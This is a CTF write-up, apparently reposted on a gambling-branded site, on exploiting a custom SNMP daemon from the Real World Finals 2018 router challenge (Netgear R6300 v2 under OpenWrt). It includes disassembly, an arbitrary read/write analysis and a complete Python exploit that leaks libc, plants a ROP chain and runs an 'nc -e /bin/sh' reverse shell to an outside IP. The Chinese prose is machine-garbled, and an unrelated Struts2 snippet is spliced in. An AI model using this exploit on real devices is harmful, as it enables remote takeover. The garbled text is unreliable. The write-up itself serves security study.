Real World Finals 2018 Router | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Real World Finals 2018 Router

申博_安全防护 申博 447次浏览 未收录 0个评论

Struts2 S2-016 调试学习

S2-016 影响版本 Struts2.0.0 – Struts2.3.15 漏洞成因 DefaultActionMapper类支持以”action:”、”redirect:”、”redirectAction:”作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致

近来时间比较多,把客岁Real World总决赛的路由器从新调了一遍
Real World Finals 2018 Router

Building Environment

由于我末了没有拿路由器,以是须要先搭建好全部模仿路由情况启动snmp效劳
路由器版本:

Netgear R6300 v2
#https://openwrt.org/toh/netgear/netgear_r6300_v2

起首下载openwrt的源码(18.06.1和18.06.2皆可,只是末了EXP中偏移能够分歧)
设置装备摆设config:

Target System: BCM47XX/53XX
Target Profile: Netgear R6300 v2
Target Images: squashfs //天生文件体系即可
Development: gdb&&gdbserver //便于后续调试

然后生存设置装备摆设并编译
在编译好的文件中找到编译好的文件体系:

# ls
bin  etc  mnt      proc  root  sys  usr  www
dev  lib  overlay  rom   sbin  tmp  var

有两个思绪:

经由历程文件体系制造镜像,再用qemu启动 #没有胜利
在qemu启动的arm虚拟机或许能够运转arm的情况下chroot开启全部情况

我挑选直接在树莓派中搭建情况
(也能够在qemu system mode下的arm虚拟机中启动,背面有申明)
将文件体系全部放入树莓派中(包孕竞赛的两个ipk包):
然后设置装备摆设chroot情况:

sudo mount proc chroot_dir/proc -t proc
sudo mount sysfs  chroot_dir/sys -t sysfs
cp  /etc/hosts  chroot_dir/etc/hosts  #设置装备摆设收集情况
编纂 chroot_dir/etc/resolv.conf:  #设置装备摆设DNS情况
nameserver 8.8.8.8

开启chroot情况:

sudo chroot  .  ./bin/sh

然后装置竞赛的snmp情况:

opkg install ./libnetsnmp_5.8-1_arm_cortex-a9.ipk
opkg install ./snmpd_5.8-1_arm_cortex-a9.ipk
#能够存在报错没法竖立设置装备摆设文件,在var下竖立run文件夹即可

确认snmp效劳启动:
路由器情况端:

/ # netstat -anp|grep snmpd
udp        0      0 0.0.0.0:161             0.0.0.0:*                           1922/snmpd
udp        0      0 :::161                  :::*                                1922/snmpd
unix  2      [ ACC ]     STREAM     LISTENING      18493 1922/snmpd          /var/run/agentx.sock

本机端:

kirin@kirin-virtual-machine:~$ snmpwalk -v 1 -c public 192.168.137.33  .1
iso.3.6.1.4.1.2021.13.32.1.0 = INTEGER: 0
iso.3.6.1.4.1.2021.13.32.2.0 = INTEGER: 1996043560
End of MIB

一样得,在qemu system形式下启动的arm虚拟机也能够启动效劳:

下载内核&&镜像
https://people.debian.org/~aurel32/qemu/armhf/
设置装备摆设qemu虚拟机收集:
https://kirin-say.top/2019/02/23/Building-MIPS-Environment-for-Router-PWN/
启动qemu虚拟机:
sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2"  -net nic,macaddr=00:16:3e:00:00:01 -net tap 
启动效劳后一样设置装备摆设chroot情况运转即可

Find R/W at Any Address in MIB

在搭建的路由器情况下gdbserver运转snmpd,IDA下动态调试追踪顺序流
能够看到snmp效劳会先初始化mib,agent等情况:

LOAD:000125B8 BL              init_mib_modules
LOAD:000125BC LDR             R0, [R10]
LOAD:000125C0 BL              init_snmp
LOAD:000125C4 BL              init_master_agent

在init_mib_modules中能够看到:

int init_mib_modules()
{
  int result; // r0
  int v1; // r3

  result = should_init();
  if ( result )
    result = j_init_greatSensors();
  v1 = dword_1102C;
  dword_11028 = 1;
  if ( !dword_1102C )
  {
    dword_1102C = 1;
    result = snmp_register_callback(v1, 2, (int)sub_9D4);
    if ( result )
      result = snmp_log(3, "error registering for SHUTDOWN callback for mib modules\n");
  }
  return result;
}

其会先挪用init_greatSensors()注册回调函数:

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

LOAD:000008E0 init_greatSensors                       ; CODE XREF: j_init_greatSensors+8↑j
LOAD:000008E0                                         ; DATA XREF: LOAD:000002D8↑o ...
LOAD:000008E0
LOAD:000008E0 var_70          = -0x70
LOAD:000008E0 var_64          = -0x64
LOAD:000008E0 var_60          = -0x60
LOAD:000008E0 var_38          = -0x38
LOAD:000008E0
LOAD:000008E0                 LDR             R12, =(dword_A88 - 0x8FC)
LOAD:000008E4                 STMFD           SP!, {R4,R5,LR}
LOAD:000008E8                 SUB             SP, SP, #0x64
LOAD:000008EC                 ADD             LR, SP, #0x70+var_60
LOAD:000008F0                 LDR             R5, =(_GLOBAL_OFFSET_TABLE_ - 0x90C)
LOAD:000008F4                 ADD             R12, PC, R12 ; dword_A88
LOAD:000008F8                 MOV             R4, R12
LOAD:000008FC                 ADD             R12, R12, #0x28
LOAD:00000900                 LDMIA           R4!, {R0-R3}
LOAD:00000904                 ADD             R5, PC, R5 ; _GLOBAL_OFFSET_TABLE_
LOAD:00000908                 STMIA           LR!, {R0-R3}
LOAD:0000090C                 LDMIA           R4!, {R0-R3}
LOAD:00000910                 STMIA           LR!, {R0-R3}
LOAD:00000914                 LDMIA           R4, {R0,R1}
LOAD:00000918                 MOV             R4, #3
LOAD:0000091C                 STMIA           LR, {R0,R1}
LOAD:00000920                 ADD             LR, SP, #0x70+var_38
LOAD:00000924                 LDMIA           R12!, {R0-R3}
LOAD:00000928                 STMIA           LR!, {R0-R3}
LOAD:0000092C                 LDMIA           R12!, {R0-R3}
LOAD:00000930                 STMIA           LR!, {R0-R3}
LOAD:00000934                 ADD             R2, SP, #0x70+var_60
LOAD:00000938                 LDMIA           R12, {R0,R1}
LOAD:0000093C                 LDR             R3, =(off_10FFC - 0x10FAC)
LOAD:00000940                 STMIA           LR, {R0,R1}
LOAD:00000944                 LDR             R0, =(aGreatmiscsenso - 0x958)
LOAD:00000948                 LDR             R3, [R5,R3] ; handle_greatMiscSensorsDevice
LOAD:0000094C                 STR             R4, [SP,#0x70+var_70]
LOAD:00000950                 ADD             R0, PC, R0 ; "greatMiscSensorsDevice"
LOAD:00000954                 STR             R3, [SP,#0x70+var_64]
LOAD:00000958                 MOV             R3, #0xA
LOAD:0000095C                 LDR             R1, [SP,#0x70+var_64]
LOAD:00000960                 BL              netsnmp_create_handler_registration
LOAD:00000964                 BL              netsnmp_register_scalar
LOAD:00000968                 LDR             R3, =(off_10FF0 - 0x10FAC)
LOAD:0000096C                 ADD             R2, SP, #0x70+var_38
LOAD:00000970                 LDR             R0, =(aGreatmiscsenso_0 - 0x980)
LOAD:00000974                 LDR             R3, [R5,R3] ; handle_greatMiscSensorsIndex
LOAD:00000978                 ADD             R0, PC, R0 ; "greatMiscSensorsIndex"
LOAD:0000097C                 STR             R4, [SP,#0x70+var_70]
LOAD:00000980                 STR             R3, [SP,#0x70+var_64]
LOAD:00000984                 MOV             R3, #0xA
LOAD:00000988                 LDR             R1, [SP,#0x70+var_64]
LOAD:0000098C                 BL              netsnmp_create_handler_registration
LOAD:00000990                 BL              netsnmp_register_scalar
LOAD:00000994                 MOV             R0, #0x78 ; 'x' ; size_t
LOAD:00000998                 BL              malloc
LOAD:0000099C                 LDR             R3, =(vla_str - 0x9AC)
LOAD:000009A0                 MOV             R2, #0
LOAD:000009A4                 ADD             R3, PC, R3 ; vla_str
LOAD:000009A8                 STR             R0, [R3,#(mib_address - 0x11020)]
LOAD:000009AC                 STR             R2, [R3]
LOAD:000009B0                 ADD             SP, SP, #0x64
LOAD:000009B4                 LDMFD           SP!, {R4,R5,PC}
LOAD:000009B4 ; End of function init_greatSensors

能够看到其注册了两个回调函数,动态调试下看到注册历程:

int __fastcall sub_76F59344(int a1, int a2, int a3, int a4)
{
  int v4; // r5@1
  int v5; // r6@1
  int v6; // r7@1
  int v7; // r4@1
  int v8; // r5@2

  v4 = a1;
  v5 = a3;
  v6 = a4;
  v7 = ((int (__cdecl *)(int, int, int))unk_76F4D74C)(a1, a2, a3);
  if ( v7 )
  {
    v8 = ((int (__fastcall *)(int, int, int, int))unk_76F4C0D8)(v4, v7, v5, v6);
    if ( !v8 )
      ((void (__fastcall *)(int))unk_76F4C228)(v7);
  }
  else
  {
    v8 = 0;
  }
  return v8;
}

起首是写入函数地点:
Real World Finals 2018 Router
然后函数称号:
Real World Finals 2018 Router
然后mib工具对应的OID:
Real World Finals 2018 Router
能够看到此OID:1.3.6.1.4.1.2021.13.32.2.0
当应用snmpset/snmpget对此工具举行读写操纵时,会应用netsnmp_call_handler函数处置惩罚工具,终究挪用对应此OID的回调函数:handle_greatMiscSensorsDevice函数
netsnmp_call_handler症结局部:

v10 = (int (__fastcall *)(int *, int, int *, int))v8[3];
if ( !v10 )
        break;
se_find_label_in_slist((int)"agent_mode", *v6);
result = v10(v8, v9, v6, v7);
v12 = v8[2];

一样另一个回调函数handle_greatMiscSensorsIndex对应OID:
Real World Finals 2018 Router
即:1.3.6.1.4.1.2021.13.32.1.0
这时候存眷两个回调函数,发现了恣意地点读写:
handle_greatMiscSensorsDevice:

int __fastcall handle_greatMiscSensorsDevice(int a1, int a2, signed int *a3, _DWORD *a4)
{
  signed int v4; // r4
  int result; // r0
  int v6; // r0
  int v7; // r3
  const char *v8; // r2
  int v9; // r1

  v4 = *a3;
  if ( *a3 == 2 )
  {
    if ( vla_str <= 29 )
    {
      *(_DWORD *)(mib_address + 4 * vla_str) = **(_DWORD **)(*a4 + 16);
      return 0;
    }
LABEL_15:
    netsnmp_set_request_error();
    return 0;
  }
  if ( *a3 > 2 )
  {
    if ( v4 > 5 )
    {
      if ( v4 != 160 )
        goto LABEL_5;
      v6 = *a4;
      if ( vla_str > 29 )
      {
        v7 = 7;
        v9 = 4;
        v8 = "Go Back";
      }
      else
      {
        v7 = 4;
        v8 = (const char *)(mib_address + 4 * vla_str);
        v9 = 2;
      }
      snmp_set_var_typed_value(v6, v9, (int)v8, v7);
    }
    return 0;
  }
  if ( v4 )
  {
    if ( v4 != 1 )
    {
LABEL_5:
      snmp_log(3, "unknown mode (%d) in handle_greatMiscSensorsDevice\n", *a3);
      return 5;
    }
    return 0;
  }
  result = netsnmp_check_vb_type(*a4, 2);
  if ( result )
    goto LABEL_15;
  return result;
}

handle_greatMiscSensorsIndex:

int __fastcall handle_greatMiscSensorsIndex(int a1, int a2, signed int *a3, _DWORD *a4)
{
  signed int v4; // r4
  int result; // r0

  v4 = *a3;
  if ( *a3 == 2 )
  {
    vla_str = **(_DWORD **)(*a4 + 16);
    return 0;
  }
  if ( *a3 > 2 )
  {
    if ( v4 > 5 )
    {
      if ( v4 != 0xA0 )
        goto LABEL_5;
      snmp_set_var_typed_value(*a4, 2, (int)&vla_str, 4);// (netsnmp_variable_list *newvar, u_char type, const void *val_str, size_t val_len)
    }
    return 0;
  }
  if ( v4 )
  {
    if ( v4 != 1 )
    {
LABEL_5:
      snmp_log(3, "unknown mode (%d) in handle_greatMiscSensorsDevice\n", *a3);
      return 5;
    }
    return 0;
  }
  result = netsnmp_check_vb_type(*a4, 2);
  if ( result )
  {
    netsnmp_set_request_error();
    return 0;
  }
  return result;
}

能够看到handle_greatMiscSensorsDevice中:
当运用snmpset写工具时,

#*a3从0轮回->0 1 2 3 0 1 2 3......
  if ( *a3 == 2 )
  {
    if ( vla_str <= 29 )
    {
      *(_DWORD *)(mib_address + 4 * vla_str) = **(_DWORD **)(*a4 + 16);
      return 0;
    }

mid_address是在snmp效劳启动mib初始化时在init_greatSensors中:

result = malloc(0x78u);
mib_address = (int)result;
vla_str = 0;

而val_str在handle_greatMiscSensorsIndex中能够举行设置:

vla_str = **(_DWORD **)(*a4 + 16);

即我们对OID工具1.3.6.1.4.1.2021.13.32.1.0设置的值
以是当我们顺次挪用handle_greatMiscSensorsIndex举行设置vla_str,此值只需小于29(在这里设置为负数即可),然后挪用handle_greatMiscSensorsDevice即可完成恣意地点写
恣意地点读雷同道理,当snmpget读取工具时,会挪用:

#v8 = (const char *)(mib_address + 4 * vla_str);
#这里一样检测vla_str是不是大于29,设置为负数即可
snmp_set_var_typed_value(v6, v9, (int)v8, v7)

即会将工具的值设置我们组织地点处的值
然后掏出工具value返回给snmpget完成恣意地点读

POC

起首须要leak libc
想到注册回调函数地位
应用恣意地点读找到注册函数生存地点来leak libc

hex(0x76F5F9F0-0x76F5F40c)=0x5e4

然后再次应用handle来挟制顺序流,即netsnmp_call_handler中:

v10 = (int (__fastcall *)(int *, int, int *, int))v8[3];
if ( !v10 )
        break;
se_find_label_in_slist((int)"agent_mode", *v6);
result = v10(v8, v9, v6, v7);
v12 = v8[2];

这时候只须要事前部署好一条ROP链,末了将handle改成我们的rop chain地点即可挟制顺序流,终究到达RCE:

ROPgadget  --binary ./libc.so 
......
0x000596bc : ldr r3, [pc, #0x3c] ; ldr r2, [pc, #0x3c] ; add r3, pc, r3 ; ldr r0, [pc, r2] ; ldr r3, [r3] ; blx r3
......
在这里能够先将r3,r2值离别设置为&system function,&shell
修正handle并再次对snmp工具操纵即可到达RCE
#也能够挑选其他ROP链,组织能够system(shell)即可

终究POC:

#针对我模仿的路由情况,具体情况能够须要修正偏移
from pwn import *
import sys
import os
#context.log_level="debug"
def read(ip,offset):
   cmd1="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0 i %s" %(ip,offset/4)
   cmd2="snmpget -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.2.0"   %ip
   os.system(cmd1)
   p2=process(cmd2,shell=True)
   p2.recvuntil("INTEGER: ")
   leak=int(p2.recvuntil("\n").strip())
   p2.close()
   return leak

def write(ip,offset,note):
   cmd1="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0 i %s" %(ip,offset/4)
   cmd2="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.2.0 i %s"  %(ip,note)
   os.system(cmd1)
   sleep(0.5)
   os.system(cmd2)

def get_shell(ip):
   cmd="snmpget -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0"   %ip
   os.system(cmd)

if __name__=="__main__":
    ip=sys.argv[1]
    #leak addr
    handle_addr=read(ip,-0x5e4)
    mibso_base=handle_addr-0x818
    libcso_base=handle_addr+0x507e8
    log.info("mibso_base="+hex(mibso_base))
    log.info("libcso_base="+hex(libcso_base))
    system_addr=libcso_base+0x43210
    ropchain_addr=libcso_base+0x596bc
    r3_addr=libcso_base+0x80394
    r2_addr=libcso_base+0x80398

    #build rop chain
    base=mibso_base+0xd29f0
    cmd_addr=libcso_base+0x80420
    write(ip,r3_addr-base,system_addr)
    write(ip,r2_addr-base,cmd_addr)
    cmd="nc -e /bin/sh 192.168.160.131 1234\x00" #the shell you want run in router
    #padding
    cmd+="1"
    time=len(cmd)/4
    cmd=cmd.ljust((time+1)*4,"1")
    for i in range(time):
          write(ip,cmd_addr+i*4-base,u32(cmd[i*4:i*4+4]))
    write(ip,-0x5e4,ropchain_addr)
    get_shell(ip)

Run POC&&Get Shell

python payload.py  router_ip

Real World Finals 2018 Router

Struts2 S2-016 调试学习

S2-016 影响版本 Struts2.0.0 – Struts2.3.15 漏洞成因 DefaultActionMapper类支持以”action:”、”redirect:”、”redirectAction:”作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Real World Finals 2018 Router
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址